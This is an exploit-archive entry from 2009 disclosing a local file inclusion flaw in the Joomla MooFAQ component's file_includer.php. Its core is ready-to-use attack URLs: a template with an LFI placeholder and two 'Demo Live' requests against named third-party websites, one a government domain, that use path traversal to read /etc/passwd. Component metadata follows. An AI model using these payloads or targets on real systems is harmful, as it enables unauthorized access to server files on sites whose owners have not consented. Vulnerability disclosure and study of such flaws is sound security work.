[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component MooFAQ (com_moofaq) LFI Vulnerability
# Published : 2009-06-08
# Author : Chip D3 Bi0s
# Previous Title : Interlogy Profile Manager Basic Insecure Cookie Handling Vulnerability
# Next Title : Frontis 3.9.01.24 (source_class) Remote SQL Injection Vulnerability
----------------------------------------------------------------------
Joomla Component MooFAQ Local File Inclusion Vulnerability
----------------------------------------------------------------------
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : LFI
###################################################
________________________________________________________
Example:
http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI]
Demo Live (1):
http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
Demo Live (2):
http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd
++++++++++++++++++++++++++++++++
[!] Produced in South America
--------------------------------
<productName>FAQ Component using mooTools</productName>
<creationDate>20 July 2007</creationDate>
<version>1.0</version>
<joomlaVersion>1.0.13</joomlaVersion>
<author>Douglas Machado</author>
<authorName>Douglas Machado</authorName>
<authorEmail>falecom@focalizaisso.com.br</authorEmail>
<authorUrl>opensource.focalizaisso.com.br</authorUrl>
<productPicture>config.png</productPicture>
<productUrl>http://opensource.focalizaisso.com.br/</productUrl>
<setupUrl>http://opensource.focalizaisso.com.br/</setupUrl>
# www.Syue.com [2009-06-08]